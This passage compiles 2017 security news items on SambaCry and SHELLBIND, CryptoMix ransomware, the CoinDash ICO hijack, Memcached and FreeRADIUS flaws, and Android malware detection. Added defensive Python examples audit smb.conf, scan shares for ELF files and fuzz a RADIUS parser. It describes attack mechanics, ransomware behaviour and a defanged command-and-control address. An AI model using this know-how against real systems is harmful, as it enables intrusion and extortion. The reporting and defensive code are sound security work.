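            fh.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9)   # header bytes only
        with open(os.path.join(share, "readme.txt"), "w") as fh:
            fh.write("quarterly report\n")
        return find_elf_files(share)

if __name__ == "__main__":
    print(upstream_version_patched(parse_version("Version 4.4.13-Ubuntu")))  # False
    print(assess_config(SAMPLE_SMB_CONF))
    print(demo_share_scan())
```

Two caveats apply when running this against a real host: the `[docs]` share in the sample is writable but restricted to `valid users`, so it is not flagged, yet the article's last point still holds, because any account with write access to a share is enough to deliver the payload; and the smb.conf reader ignores `write list` and `include` directives, so treat its verdict as a first pass rather than a substitute for `testparm`.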


IntelliAV: Toward the Feasibility of Building Intelligent Anti-Malware on Android Devices
19.7.2017 securityaffairs Android

IntelliAV is a practical intelligent anti-malware solution for Android devices based on the open-source and multi-platform TensorFlow library.
Android is targeted the most by malware coders as the number of Android users is increasing. Although there are many Android anti-malware solutions available in the market, almost all of them are based on malware signatures, and more advanced solutions based on machine learning techniques are not deemed to be practical for the limited computational resources of mobile devices.

There are many reasons for a user to have an intelligent security tool capable of identifying potential malware on the device.

1. The Google Play Store is not totally free of malware. Much zero-day mobile malware has been found in Google Play in the past.

2. Third-party app stores are popular among mobile users. Nevertheless, security checks on the third-party stores are not as effective as those available on the Google Play Store.

3. Quite often users are lured by tempting fake titles, such as free games, while browsing the web, so that applications are downloaded and installed directly on devices from untrusted websites.

4. Another source of infection is phishing SMS messages that contain links to malicious applications. Recent reports by Lookout and Google show how a targeted attack malware, namely Pegasus(Chrysaor), which is suspected of infecting devices via a phishing attack, could remain undetected for a few years.

5. One of the main concerns for any computing device in the industry is to make sure that the device a user buys is free of malware. Mobile devices are no exception, and securing the supply chain is extremely difficult, given the number of people and companies involved in the supply chain of the components.
A recent report shows how some malware was added to Android devices somewhere along the supply chain before the user received the phone.

6. Almost all Android anti-malware products are signature-based, which lets both variants of known malware families and zero-day threats through to devices. A few Android anti-malware vendors claim that they use machine learning approaches, but no detail is available on the mechanisms that are actually implemented on the device.

7. Offline machine learning systems would fail against wrapper/downloader malware, as the wrapper/downloader app usually doesn't reveal enough malicious activity.

IntelliAV (http://www.intelliav.com) is a practical intelligent anti-malware solution for Android devices based on the open-source and multi-platform TensorFlow library.
Details of the system can be found in a paper that the authors will present at the CD-MAKE 2017 conference in September in Reggio Calabria, Italy.

IntelliAV does not aim to propose yet another learning-based system for Android malware detection. Instead, by building on the existing literature, the authors tested the feasibility of having an on-device intelligent anti-malware tool to tackle the deficiencies of existing Android anti-malware products, which are mainly based on pattern matching techniques.
The architecture of the proposed IntelliAV system consists of two main phases: offline training of the model, and then its operation on the device to detect potential malware samples.
In the first phase, a classification model is built offline on a conventional computing environment. It is not necessary to perform the training phase on the device, because training has to be performed on a substantial set of samples whenever needed to take into account the evolution of malware. The number of times the model needs to be updated should be quite small, as reports by AV-TEST showed that just 4% of the total number of Android malware is actually new malware.
In the second phase, the model is embedded in the IntelliAV Android application, which provides a risk score for each application on the device.
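To make the two-phase design concrete, here is an added example (not IntelliAV's code and not the feature set from the paper) in plain Python: an offline phase fits a logistic-regression classifier on constructed permission-based feature vectors and exports it as plain numbers, and an on-device phase turns one app's permissions into a risk score between 0 and 1. The feature vocabulary, the training corpus and the 0.5 decision threshold are all assumptions made for the example; a real deployment would use a much richer feature set and a larger model, which is where a library like TensorFlow comes in.

```python
import math

# Permission-based feature vocabulary. Constructed for this example; IntelliAV's
# real feature set is larger and is not reproduced here.
FEATURES = ["SEND_SMS", "READ_SMS", "RECEIVE_BOOT_COMPLETED", "INTERNET",
            "ACCESS_FINE_LOCATION", "READ_CONTACTS", "CAMERA", "WRITE_EXTERNAL_STORAGE"]

# Constructed training corpus: (permissions requested by the app, label);
# label 1 = malware, 0 = benign.
TRAINING_SET = [
    ({"SEND_SMS", "READ_SMS", "RECEIVE_BOOT_COMPLETED", "INTERNET"}, 1),
    ({"SEND_SMS", "READ_CONTACTS", "INTERNET"}, 1),
    ({"READ_SMS", "RECEIVE_BOOT_COMPLETED", "INTERNET", "ACCESS_FINE_LOCATION"}, 1),
    ({"SEND_SMS", "READ_SMS", "READ_CONTACTS", "INTERNET"}, 1),
    ({"INTERNET", "CAMERA", "WRITE_EXTERNAL_STORAGE"}, 0),
    ({"INTERNET", "ACCESS_FINE_LOCATION"}, 0),
    ({"CAMERA", "WRITE_EXTERNAL_STORAGE"}, 0),
    ({"INTERNET", "WRITE_EXTERNAL_STORAGE"}, 0),
]


def vectorize(permissions):
    """Map a set of permission names to a 0/1 feature vector over FEATURES."""
    return [1.0 if f in permissions else 0.0 for f in FEATURES]


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def train_offline(samples, epochs=2000, lr=0.5):
    """Phase 1 (offline, on a conventional machine): fit a logistic-regression
    model with batch gradient descent. The result is a dict of plain numbers so
    it can be shipped inside the app without any training code on the device."""
    n = len(FEATURES)
    weights = [0.0] * n
    bias = 0.0
    data = [(vectorize(p), float(y)) for p, y in samples]
    m = len(data)
    for _ in range(epochs):
        grad_w = [0.0] * n
        grad_b = 0.0
        for x, y in data:
            err = sigmoid(sum(w * xi for w, xi in zip(weights, x)) + bias) - y
            for i in range(n):
                grad_w[i] += err * x[i]
            grad_b += err
        weights = [w - lr * g / m for w, g in zip(weights, grad_w)]
        bias -= lr * grad_b / m
    return {"features": list(FEATURES), "weights": weights, "bias": bias}


def risk_score(model, permissions):
    """Phase 2 (on device): score one app from its permissions.
    0.0 means confidently benign, 1.0 means confidently malicious."""
    x = vectorize(permissions)
    z = sum(w * xi for w, xi in zip(model["weights"], x)) + model["bias"]
    return sigmoid(z)


def classify(model, permissions, threshold=0.5):
    """Turn the risk score into the verdict the app would show (threshold is an assumption)."""
    return "malware" if risk_score(model, permissions) > threshold else "benign"


if __name__ == "__main__":
    model = train_offline(TRAINING_SET)
    for perms in ({"SEND_SMS", "READ_SMS", "INTERNET"}, {"CAMERA", "WRITE_EXTERNAL_STORAGE"}):
        print(sorted(perms), round(risk_score(model, perms), 3), classify(model, perms))
```

The split matters for the points made above: the expensive, data-hungry part runs once offline and is re-run only when the malware landscape shifts, while the device only evaluates a fixed set of weights per app, which is cheap enough for a Quick Scan of every installed package or a Custom Scan of a freshly downloaded apk.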


IntelliAV can scan all of the installed applications on the device, and verify their risk scores (Quick Scan). In addition, when a user downloads an apk, it can be analyzed by IntelliAV before installation to check the related risk score, and take the appropriate decision (Custom Scan).


Challenging Modern AV vendors

Based on recent reports by VirusTotal, an increasing number of anti-malware developers resort to machine learning approaches for malware detection. However, the main focus of these products appears to be desktop malware, especially Windows PE malware. Based on the available public information, there is only limited evidence of two anti-malware developers that use machine learning approaches for Android malware detection, namely Symantec and TrustLook. Their products are installed by more than 10 million users. While it is not clear how these products use machine learning, the authors considered them as two candidates for comparison with IntelliAV. To provide a sound comparison, in addition to the Symantec and TrustLook products, the authors selected three other Android anti-malware products, i.e., AVG, Avast, and Qihoo 360, which are the most popular among Android users, having been installed more than 100 million times. The authors compared the performance of IntelliAV against these products on 2311 recent Android malware samples (from January to March 2017).


As an independent test, IntelliAV was tested by AV-TEST on 500 recent and common Android malware samples in July 2017.
Interestingly, it achieved a 96% detection rate even though the last model update of IntelliAV dates from December 2016, which shows the ability of IntelliAV to detect unknown malware.


About the Author Mansour Ahmadi

IntelliAV has been developed at the University of Cagliari, Italy, by Mansour Ahmadi, Angelo Sotgiu, and Giorgio Giacinto. Mansour Ahmadi is a post-doctoral researcher at the PRA lab at the University of Cagliari, Italy. Angelo Sotgiu has a bachelor degree from the University of Cagliari. Prof. Giorgio Giacinto is an Associate Professor of Computer Engineering at the University of Cagliari.


Lithuania to extradite the man responsible for 100M email scam against Google and Facebook
19.7.2017 securityaffairs
Social

A Lithuanian court on Monday ruled to extradite a man to the US to face charges of allegedly swindling $100M from Google and Facebook via an email scam.
A Lithuanian man who allegedly swindled $100 million (roughly 87 million euros) from the tech companies Google and Facebook will be extradited to the United States soon.

The Lithuanian citizen Evaldas Rimasauskas (48) was arrested in March by local authorities at the request of US law enforcement, because he allegedly stole the huge amount of money from the two IT giants by posing as a large Asia-based hardware vendor.

The fraudulent activities happened between 2013 and 2015.

“The court has ruled in favor of extraditing Lithuanian citizen Evaldas Rimasauskas to the United States for criminal prosecution,” Judge Aiva Surviliene said.

Evaldas Rimasauskas is pictured in district court in Vilnius in May 2017 – Source AFP

The indictment explicitly mentioned Facebook and Google. According to the investigators, Rimasauskas created email accounts to trick victims into believing that the emails were sent by employees at the Asian hardware vendor.

He is accused of forging invoices, contracts, and letters to trick administrative personnel into wiring over $100 million to overseas bank accounts that he controlled.

Rimasauskas's lawyer, Snieguole Uzdaviniene, announced that her client intends to appeal against the indictment.

Google confirmed that its systems were not hacked by the criminal; nevertheless, the company reviewed its internal processes and implemented countermeasures against email scams and BEC.

“We detected this fraud against our vendor management team and promptly alerted the authorities,” a Google spokesman told AFP. “We recouped the funds and we’re pleased this matter is resolved.”

Rimasauskas is waiting for the extradition and faces a maximum of 20 years in jail if convicted.


Two CryptoMix Ransomware variants emerged in a few days
19.7.2017 securityaffairs
Ransomware

Two CryptoMix Ransomware variants emerged in a few days, a circumstance that suggests the operators behind the threat are very active.
Malwarebytes’ researcher Marcelo Rivero has spotted a new variant of the CryptoMix ransomware.


Marcelo Rivero @MarceloRivero
#CryptoMix #Ransomware adds ext ".EXTE" to encrypted files, and the note "_HELP_INSTRUCTION.TXT" - md5: 1059676fbb9d811e88af96716cc1ffb5
12:07 AM - 14 Jul 2017
The CryptoMix malware family was spotted more than a year ago; numerous improvements have been added over time, except for the encryption method, which has remained the same.

Since the beginning of this year, researchers discovered at least three other CryptoMix variants in the wild, Wallet, CryptoShield, and Mole02.

The last variant observed by Rivero appends the ‘.EXTE’ extension to encrypted files.

Once the ransomware is launched on a computer, it drops a file in the ApplicationData folder and the ransom note in the targeted files’ folders. The ransomware creates a unique ID for each system and sends it to the C&C server.

Authors of the malware ask victims to pay the ransom in Bitcoins and use the email as a communication channel with the victims.

“While overall the encryption methods stay the same in this variant, there have been some differences. First and foremost, we have a new ransom note with a file name of _HELP_INSTRUCTION.TXT.” wrote researcher Lawrence Abrams from BleepingComputer.

“The next noticeable change is the extension appended to encrypted files. With this version, when a file is encrypted by the ransomware, it will modify the filename and then append the .EXTE extension to encrypted file’s name. For example, a test file encrypted by this variant has an encrypted file name of 32A1CD301F2322B032AA8C8625EC0768.EXTE.”

Lawrence also remarked that a different variant of the CryptoMix ransomware was observed appending the .AZER extension to the encrypted files.


Researchers observed that this variant uses a different ransom note (_INTERESTING_INFORMACION_FOR_DECRYPT.TXT) and different email addresses to receive communications from the victims.

The AZER CryptoMix ransomware is the first malware of the family that works completely offline: its code includes ten different RSA-1024 public encryption keys and uses one of them to encrypt the AES key with which it encrypts the files.

“Last, but not least, this version performs no network communication and is completely offline. It also embeds ten different RSA-1024 public encryption keys, which are listed below. One of these keys will be selected to encrypt the AES key used to encrypt a victim’s files. This is quite different compared to the Mole02 variant, which only included one public RSA-1024 key.” states BleepingComputer.

The same feature was also implemented in the latest EXTE version: the experts observed that it also embeds the ten public RSA keys, allowing the threat to work without a network connection.

The discovery of two variants of the CryptoMix ransomware in the wild in a few days suggests the operators behind the threat are very active.


Hacker steals $7 Million in Ethereum from CoinDash in just 3 minutes
19.7.2017 securityaffairs Hacking

Hacker steals $7 Million in Ethereum from CoinDash in just 3 minutes after the ICO launch. Attacker tricked investors into sending ETH to the wrong address.
Cybercrime can be a profitable business: crooks stole $7 million worth of Ethereum in just 3 minutes. The cyber heist was possible thanks to ‘a simple trick.’
Hackers stole the money from the Israeli social-trading platform CoinDash.
CoinDash launched an Initial Coin Offering (ICO) to allow investors to pay with Ethereum and send funds to the token sale’s smart contract address.
Hackers were able to divert over $7 million worth of Ethereum by replacing the legitimate wallet address used for the ICO with their own.

Within three minutes of the ICO launch, the attacker tricked CoinDash’s investors into sending 43438.455 Ether to the wrong address, one owned by the attacker.

At the moment the hacker’s wallet has a balance of 43,488 Ethereum (around $8.1 million).

Let’s look at the details of the attack.
CoinDash’s ICO published an Ethereum address on its website to allow investors to transfer the Ethereum funds.

After a few minutes of the launch, the company warned that its website had been hacked and confirmed that the ICO legitimate address was replaced by a fraudulent address.

The startup asked to stop sending Ethereum to the posted address.

“GUYS WEBSITE IS HACKED! Don’t send your ETH!!!” reads the message from CoinDash HQ.
“Wait for the announcement of the address”

CoinDash.io @coindashio
The Token Sale is done, do not send any ETH to any address. Official statement regarding the hack will be released soon.
4:39 PM - 17 Jul 2017
Too late!
“The CoinDash Token Sale opened to the public on July 17 at 13:00PM GMT, starting with a 15 minute heads up for whitelist contributors. During these 15 minutes, 148 whitelisted contributors sent 39,000 ETH to the token sale smart contract that were secured with a multisig wallet.” reads the statement issued by the company. “The moment the token sale went public, the CoinDash website was hacked and a malicious address replaced the CoinDash Token Sale address. As a result, more than 2,000 investors sent ETH to the malicious address. The stolen ETH amounted to a total of 37,000 ETH.”
The company confirms it gathered around $6 million during the first three minutes of the ICO. It announced that it would issue tokens to the people who sent these funds to the correct wallet, but it also ensured that it will issue the tokens for the users that have been impacted by the hack and that sent the money to the hacker’s wallet.

“The CoinDash Token Sale secured $6.4 Million from our early contributors and whitelist participants and we are grateful for your support and contribution. CoinDash is responsible to all of its contributors and will send CDTs reflective of each contribution. Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly,” said the company.

However, CoinDash clarified that it would not compensate users who sent funds to the hacker’s address after the website was shut down by the company.

“CoinDash is responsible to all of its contributors and will send CDTs [CoinDash Tokens] reflective of each contribution,” the company noted.

“Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly.”

CoinDash.io @coindashio
If you sent ETH to the hacker address, please fill this form.https://docs.google.com/a/coindash.io/forms/d/13S2gbsO2eHcqk7MmAwLF9Ky1k4E7EUE9jnry79GR50U/edit?ts=596cfbdf …
8:16 PM - 17 Jul 2017
Some users speculate that the cyber heist is an insider job. Stay tuned.


SHELLBIND IoT malware targets NAS devices exploiting SambaCry flaw
19.7.2017 securityaffairs
Vulnerability

The seven-year-old remote code execution vulnerability SambaCry is being exploited by the SHELLBIND IoT malware to target NAS devices.
A new strain of malware dubbed SHELLBIND exploits the recently patched CVE-2017-7494 Samba vulnerability in attacks against Internet of Things devices.
SHELLBIND has mostly infected network-attached storage (NAS) appliances; it exploits the Samba vulnerability (also known as SambaCry and EternalRed) to upload a shared library to a writable share and then cause the server to load that library.

This trick allows a remote attacker to execute arbitrary code on the targeted system.

CVE-2017-7494 is a seven-year-old remote code execution vulnerability that affects all versions of the Samba software since 3.5.0. The flaw has been patched by the development team of the project.
The CVE-2017-7494 flaw can be easily exploited; just one line of code could be used for the attack when the following conditions are met:

the file- and printer-sharing port 445 is reachable from the Internet,
shared files are configured with write privileges, and
known or guessable server paths are used for those files.
The Samba vulnerability affects the products of several major vendors, including NAS appliances.

The Samba bug appears to be network-wormable: it could be exploited by malicious code to self-replicate from vulnerable machine to vulnerable machine without requiring user interaction.
When SambaCry was discovered, nearly 485,000 Samba-enabled computers were found to be exposed on the Internet.

In June, researchers at Kaspersky Lab set up honeypots to detect SambaCry attacks in the wild. The experts spotted a malware campaign that was exploiting the SambaCry vulnerability to infect Linux systems and install a cryptocurrency miner.

“On May 30th our honeypots captured the first attack to make use of this particular vulnerability, but the payload in this exploit had nothing in common with the Trojan-Crypt that was EternalBlue and WannaCry. Surprisingly, it was a cryptocurrency mining utility!” reported Kaspersky.

The independent security researcher Omri Ben Bassat‏ also observed the same campaign that he dubbed “EternalMiner.” The expert confirmed threat actors started exploiting the SambaCry flaw just a week after its discovery to hijack Linux PCs and to install an upgraded version of “CPUminer,” a Monero miner.

In early July, experts at Trend Micro uncovered a new type of attack involving SambaCry. Crooks have been exploiting the flaw in attacks targeting NAS devices used by small and medium-size businesses. The malicious code was designed to compromise almost any IoT architecture, including MIPS, ARM, and PowerPC.
Attackers can easily find vulnerable devices using the Shodan Internet search engine and then write the malicious code to their public folders.

Experts at Trend Micro discovered that ELF_SHELLBIND.A is delivered as an SO file to Samba public folders; the attacker then loads and executes it by exploiting the SambaCry vulnerability.

“This more recent malware is detected as ELF_SHELLBIND.A and was found on July 3. Similar to the previous reports of SambaCry being used in the wild, it also opens a command shell on the target system. But ELF_SHELLBIND.A has marked differences that separate it from the earlier malware leveraging SambaCry. For one, it targets internet of things (IoT) devices—particularly the Network Attached Storage (NAS) devices favored by small to medium businesses.” reads the analysis published by Trend Micro. “ELF_SHELLBIND also targets different architectures, such as MIPS, ARM, and PowerPC. This is the first time we’ve seen SambaCry being exploited without the cryptocurrency miner as a payload.”

SHELLBIND-IoT-malware

Once executed, the malware connects to a C&C server located in East Africa, 169[.]239[.]128[.]123, over TCP port 80. To establish the connection, the malicious code modifies the firewall rules, after which the attacker opens a command shell on the target system.

“Once the connection is successfully established and authentication is confirmed, then the attacker will have an open command shell in the infected systems where he can issue any number of system commands and essentially take control of the device,” continues Trend Micro.

Sysadmins can protect their systems by updating their Samba installations. If that is not possible for any reason, a workaround can be applied by adding the line

nt pipe support = no

to the Samba configuration file and restarting the SMB daemon.

The change will limit clients from accessing some network computers.
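The exploitation conditions listed earlier (writable shares, ideally guest-accessible ones, on a server reachable over port 445) and the nt pipe support workaround can both be checked from the configuration file alone. Below is an added example, written for this article and not taken from Samba or from Trend Micro, of a small smb.conf audit in Python. It reads the configuration text, reports which shares are writable, which of those are also open to guests, and whether the global section carries nt pipe support = no. The sample configuration is constructed for the example; the parser implements only the smb.conf features needed here (sections, key = value lines, # and ; comment lines, and Samba's synonyms writable/writeable/write ok/read only and guest ok/public), and it does not check the installed Samba version or whether port 445 is actually exposed.

```python
import re

# Samba parameter synonyms for write access. True means the parameter grants
# write access when set to "yes"; False means it is the inverse ("read only").
WRITE_KEYS = {"writable": True, "writeable": True, "write ok": True, "read only": False}


def _to_bool(value):
    """Interpret a Samba boolean; returns None for anything unrecognised."""
    v = value.strip().lower()
    if v in ("yes", "true", "1"):
        return True
    if v in ("no", "false", "0"):
        return False
    return None


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section (lower-case): {parameter (lower-case): value}}.
    Lines starting with '#' or ';' are comments; a repeated parameter overrides the earlier one."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def share_is_writable(params):
    """Samba's default is 'read only = yes'. Parameters are walked in file order
    so the last write-related setting wins, as it does in Samba itself."""
    writable = False
    for key, value in params.items():
        if key in WRITE_KEYS:
            flag = _to_bool(value)
            if flag is not None:
                writable = flag if WRITE_KEYS[key] else not flag
    return writable


def share_allows_guests(params):
    """'public' is Samba's synonym for 'guest ok'; the default is no."""
    return _to_bool(params.get("guest ok", params.get("public", "no"))) is True


def audit_smb_conf(text):
    """Summarise the SambaCry-relevant settings of one smb.conf body."""
    sections = parse_smb_conf(text)
    glob = sections.get("global", {})
    shares = {name: params for name, params in sections.items() if name != "global"}
    writable = [name for name, params in shares.items() if share_is_writable(params)]
    return {
        "nt_pipe_support_disabled": _to_bool(glob.get("nt pipe support", "yes")) is False,
        "writable_shares": writable,
        "guest_writable_shares": [n for n in writable if share_allows_guests(shares[n])],
    }


# Constructed sample configuration, not taken from any real device.
SAMPLE_SMB_CONF = """
# NAS configuration (constructed example)
[global]
   workgroup = WORKGROUP
   server string = NAS

[public]
   path = /srv/samba/public
   guest ok = yes
   read only = no

[backup]
   path = /srv/samba/backup
   writable = yes
   valid users = admin

[docs]
   path = /srv/samba/docs
   read only = yes
"""

# The same configuration with the workaround from the article applied.
HARDENED_SMB_CONF = SAMPLE_SMB_CONF.replace("[global]", "[global]\n   nt pipe support = no")

if __name__ == "__main__":
    print(audit_smb_conf(SAMPLE_SMB_CONF))
    print(audit_smb_conf(HARDENED_SMB_CONF))
```

On the sample above the audit flags public and backup as writable and public as the guest-writable share, which is the combination the SHELLBIND campaign relied on, and it reports that nt pipe support is still enabled until the hardened version is used. As the article notes, the workaround limits some client functionality, so the real fix remains updating Samba.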


Organizations Slow to Patch Critical Memcached Flaws

18.7.2017 securityweek Vulnerability

Tens of Thousands of Internet-Exposed Memcached Servers Are Vulnerable to Attacks

Tens of thousands of servers running Memcached are exposed to the Internet and affected by several critical vulnerabilities disclosed last year by Cisco’s Talos intelligence and research group.

In late October 2016, Talos published an advisory describing three serious flaws affecting Memcached, an open source, high performance distributed memory caching system used to speed up dynamic web apps by reducing the database load.

The vulnerabilities, tracked as CVE-2016-8704, CVE-2016-8705 and CVE-2016-8706, allow a remote attacker to execute arbitrary code on vulnerable systems by sending specially crafted Memcached commands. The flaws can also be leveraged to obtain sensitive data that could allow an attacker to bypass exploit mitigations.

The security holes were patched by Memcached developers before Talos disclosed its findings. A few months later, in late February and early March 2017, researchers conducted Internet scans to find out how many organizations had patched their installations.

The scans uncovered a total of more than 107,000 servers accessible over the Internet and nearly 80 percent of them, or roughly 85,000 servers, were still vulnerable. Furthermore, only approximately 22 percent of the servers, or roughly 24,000, required authentication.

Nearly 30,000 of the vulnerable servers were located in the United States, followed by China (17,000), the United Kingdom (4,700), France (3,200), Germany (3,000), Japan (3,000), the Netherlands (2,600), India (2,500) and Russia (2,300).

After completing the scans, Cisco obtained contact email addresses for all the IP addresses associated with the vulnerable servers and attempted to notify affected organizations.

Six months later, researchers conducted another scan, but the situation improved only slightly, with roughly 10 percent of systems patched since the previous analysis. However, the number of servers requiring authentication dropped to 18,000, or 17 percent of the total.

Interestingly, researchers noticed that more than 28,000 of the previously discovered servers were no longer online. However, since the total number of Internet-facing installations remained the same, experts determined that some servers either changed their IPs or organizations had been deploying new systems with vulnerable versions of Memcached.

Talos warned that these vulnerable Memcached installations could be targeted in ransom attacks similar to the ones that hit MongoDB databases in early 2017. While Memcached is not a database, it can still contain sensitive information and disrupting it could have a negative impact on other dependent services.

“The severity of these types of vulnerabilities cannot be understated,” experts warned. “These vulnerabilities potentially affect a platform that is deployed across the internet by small and large enterprises alike. With the recent spate of worm attacks leveraging vulnerabilities this should be a red flag for administrators around the world. If left unaddressed the vulnerabilities could be leveraged to impact organizations globally and impact business severely.”

The number of Memcached instances accessible from the Internet has remained fairly constant over the past years. An analysis conducted in August 2015 uncovered 118,000 Memcached instances exposing 11 terabytes of data.


Code Execution, DoS Vulnerabilities Found in FreeRADIUS

18.7.2017 securityweek Vulnerability

Security testing of FreeRADIUS using a technique known as fuzzing revealed more than a dozen issues, including vulnerabilities that can be exploited for denial-of-service (DoS) attacks and remote code execution.

Researcher Guido Vranken recently discovered several flaws in OpenVPN through fuzzing, a technique that involves automatically injecting malformed or semi-malformed data into software to find implementation bugs. One of the flaws also turned out to impact FreeRADIUS, an open source implementation of RADIUS (Remote Authentication Dial-In User Service), a networking protocol for user authentication, authorization and accounting.
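To show what a fuzzing harness of the kind described here actually does, the following is an added example in Python; it is not Vranken's fuzzer and not FreeRADIUS code. It contains a toy parser for the RADIUS attribute-value-pair layout (type byte, length byte that counts the two-byte header, value bytes) in two versions: a naive one that trusts the length field, and a checked one that rejects malformed input with a controlled exception. A seeded mutation fuzzer flips, truncates and extends a constructed sample packet and counts, per parser, how many inputs were accepted, how many were rejected in a controlled way, and how many produced an unexpected exception, which is the signal a real fuzzer reports as a crash. The sample packet, the mutation operators and the iteration count are assumptions made for the example.

```python
import random
import struct

# RADIUS AVP layout (RFC 2865): Type (1 byte), Length (1 byte, counts the
# 2-byte header, so the smallest valid value is 2), Value (Length - 2 bytes).
MIN_AVP_LEN = 2


class MalformedPacket(ValueError):
    """Controlled rejection: the parser noticed the input is invalid."""


def parse_avps_naive(data):
    """Trusts the length byte. Constructed for the example to show what the
    fuzzer catches: a trailing single byte makes the header unpack blow up."""
    attrs = []
    pos = 0
    while pos < len(data):
        avp_type, avp_len = struct.unpack_from("BB", data, pos)  # struct.error on 1 leftover byte
        attrs.append((avp_type, data[pos + 2:pos + avp_len]))
        pos += max(avp_len, 1)  # advance at least one byte so the loop cannot hang
    return attrs


def parse_avps(data):
    """Checked parser: every read is bounds-checked and bad lengths are rejected."""
    attrs = []
    pos = 0
    while pos < len(data):
        if len(data) - pos < MIN_AVP_LEN:
            raise MalformedPacket("truncated AVP header at offset %d" % pos)
        avp_type = data[pos]
        avp_len = data[pos + 1]
        if avp_len < MIN_AVP_LEN:
            raise MalformedPacket("AVP length %d below minimum" % avp_len)
        if pos + avp_len > len(data):
            raise MalformedPacket("AVP length %d overruns packet" % avp_len)
        attrs.append((avp_type, data[pos + 2:pos + avp_len]))
        pos += avp_len
    return attrs


def build_avp(avp_type, value):
    return bytes([avp_type, len(value) + MIN_AVP_LEN]) + value


# Constructed seed input: User-Name (type 1) and NAS-IP-Address (type 4).
SAMPLE = build_avp(1, b"alice") + build_avp(4, bytes([192, 0, 2, 10]))


def mutate(data, rng):
    """One random mutation: overwrite a byte, truncate, or append junk."""
    buf = bytearray(data)
    op = rng.randrange(3)
    if op == 0 and buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif op == 1 and buf:
        del buf[rng.randrange(len(buf)):]
    else:
        buf += bytes(rng.randrange(256) for _ in range(rng.randrange(1, 8)))
    return bytes(buf)


def fuzz(parser, seed_input, iterations=2000, seed=1):
    """Run the parser on mutated inputs; anything other than a clean result or a
    MalformedPacket is recorded as a crash, with the input that triggered it."""
    rng = random.Random(seed)
    stats = {"accepted": 0, "rejected": 0, "crashes": []}
    for _ in range(iterations):
        case = mutate(seed_input, rng)
        try:
            parser(case)
            stats["accepted"] += 1
        except MalformedPacket:
            stats["rejected"] += 1
        except Exception as exc:  # unexpected exception: a parser bug worth reporting
            stats["crashes"].append((case.hex(), repr(exc)))
    return stats


if __name__ == "__main__":
    for name, parser in (("naive", parse_avps_naive), ("checked", parse_avps)):
        result = fuzz(parser, SAMPLE)
        print(name, result["accepted"], result["rejected"], len(result["crashes"]))
```

The naive parser is reported with crashes within a couple of thousand iterations while the checked one only ever accepts or rejects, which is the property a fuzzing run is meant to establish. Real fuzzers add coverage feedback and run for far longer, and each recorded crash input is kept so the bug can be reproduced and turned into a regression test, much as FreeRADIUS planned to do by integrating the fuzzer into its releases.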

After patching the vulnerability, the developers of FreeRADIUS, said to be the world’s most popular RADIUS server, asked Vranken to fuzz their software as well.

Testing conducted by the researcher led to the discovery of 11 security issues and FreeRADIUS developers identified an additional four problems. Of the 15 weaknesses affecting versions 2 and/or 3 of the software, five cannot be exploited and six affect DHCP packet parsers. The security holes were addressed on Monday with the release of versions 2.2.10 and 3.0.15.

The list of vulnerabilities includes memory leak, out-of-bounds read, memory exhaustion, buffer overflow and other issues that can be exploited to remotely execute arbitrary code or cause a DoS condition. The flaws can be exploited by sending specially crafted packets to the targeted server.

The vulnerabilities that can be leveraged for remote code execution are CVE-2017-10984, which affects versions 3.0.0 through 3.0.14, and CVE-2017-10979, which affects versions 2.0.0 through 2.2.9. They can be exploited by sending packets with malformed WiMAX attributes.

“The short summary is that if your RADIUS server is on a private network, accessible only by managed devices, you are likely safe. If your RADIUS server is part of a roaming consortium, then anyone within that consortium can attack it. If your RADIUS server is on the public internet, then you are not following best practices, and anyone on the net can attack your systems,” FreeRADIUS maintainers explained.

They pointed out that writing secure code in C is a big challenge, which is why they have been using several static analysis tools to identify vulnerabilities. However, the fuzzing tests uncovered many flaws that were previously missed by these tools, which is why FreeRADIUS developers plan on integrating the fuzzer into all future releases of their software.


Two Iranians Charged in U.S. Over Hacking Defense Materials

18.7.2017 securityweek CyberSpy

Two Iranians were indicted Monday in the United States with hacking a defense contractor and stealing sensitive software used to design bullets and warheads, according to the Justice Department.

According to the newly unsealed indictment, businessman Mohammed Saeed Ajily, 35, recruited Mohammed Reza Rezakhah, 39, to break into companies' computers and steal their software for resale to Iranian universities, the military and the government.

The two men -- and a third who was arrested in 2013 and handed back to Iran in a prisoner swap last year -- allegedly broke into the computers of Vermont-based Arrow Tech Associates.

The indictment said they stole in 2012 the company's Prodas ballistics software, which is used to design and test bullets, warheads and other military ordnance projectiles.

The material stolen from Arrow Tech was protected by US controls on the export of sensitive technologies, and its distribution to Iran was banned by US sanctions on the country.

The two men were charged in the Rutland, Vermont federal district court, which issued arrest warrants for the two, who are believed to be in Iran.

In 2013 the US secured the arrest in Turkey of a third Iranian in the case, Nima Golestaneh, 30, who was extradited to the United States.

In December 2015 he pleaded guilty to charges of wire fraud and computer hacking.

One month later he was freed as part of a prisoner exchange with Tehran, which returned four Americans in exchange for seven Iranians who had been arrested in separate schemes to obtain and smuggle to Iran sensitive US technologies.


Hacker Steals $7 Million in Ethereum From CoinDash

18.7.2017 securityweek Hacking

An attacker managed to hack the CoinDash official website during the company's ICO (Initial Coin Offering) and diverted over $7 million worth of Ethereum by replacing the official wallet address with their own.

The incident took place on Monday, just minutes after the company launched its ICO in an attempt to raise funds in the form of the Ethereum crypto-currency. Similar to an Initial Public Offering (IPO), an ICO happens when a company looks to gather funds and issues tokens in return.

According to CoinDash, the hacker managed to take over the official website only three minutes after the ICO started. They replaced the official Ethereum wallet address with their own, which resulted in people sending over $7 million to the fraudulent address.

The company shut down the website immediately after discovering the hack and also posted warnings on their Twitter account, informing users of the issue. They also posted an official statement on the website, to provide additional details on the matter.

The company says it managed to gather around $6 million during the first three minutes of the ICO. It also announced that it would issue tokens not only to the people who sent these funds, but also to those who ended up sending their money to the hacker’s wallet.

